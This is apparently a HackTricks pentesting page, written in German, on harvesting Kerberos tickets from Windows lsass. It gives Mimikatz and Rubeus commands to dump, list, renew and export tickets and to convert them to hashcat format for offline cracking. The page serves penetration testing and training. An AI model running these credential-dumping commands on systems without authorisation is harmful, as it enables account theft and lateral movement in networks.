# Harvesting tickets from Windows

{{#include ../../banners/hacktricks-training.md}}

Tickets in Windows werden vom **lsass** (Local Security Authority Subsystem Service) Prozess verwaltet und gespeichert, der für die Handhabung von Sicherheitsrichtlinien verantwortlich ist. Um diese Tickets zu extrahieren, ist es notwendig, mit dem lsass-Prozess zu interagieren. Ein nicht-administrativer Benutzer kann nur auf seine eigenen Tickets zugreifen, während ein Administrator das Privileg hat, alle Tickets im System zu extrahieren. Für solche Operationen werden die Tools **Mimikatz** und **Rubeus** häufig eingesetzt, die jeweils unterschiedliche Befehle und Funktionen bieten.

### Mimikatz

Mimikatz ist ein vielseitiges Tool, das mit der Windows-Sicherheit interagieren kann. Es wird nicht nur zum Extrahieren von Tickets verwendet, sondern auch für verschiedene andere sicherheitsbezogene Operationen.
```bash
# Extracting tickets using Mimikatz
sekurlsa::tickets /export
```
### Rubeus

Rubeus ist ein Tool, das speziell für die Interaktion und Manipulation von Kerberos entwickelt wurde. Es wird für die Ticketextraktion und -verarbeitung sowie für andere Kerberos-bezogene Aktivitäten verwendet.
```bash
# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>
```
Beim Verwenden dieser Befehle stellen Sie sicher, dass Sie Platzhalter wie `<BASE64_TICKET>` und `<luid>` durch das tatsächliche Base64-kodierte Ticket und die Logon-ID ersetzen. Diese Tools bieten umfangreiche Funktionen zur Verwaltung von Tickets und zur Interaktion mit den Sicherheitsmechanismen von Windows.

## References

- [https://www.tarlogic.com/en/blog/how-to-attack-kerberos/](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)

{{#include ../../banners/hacktricks-training.md}}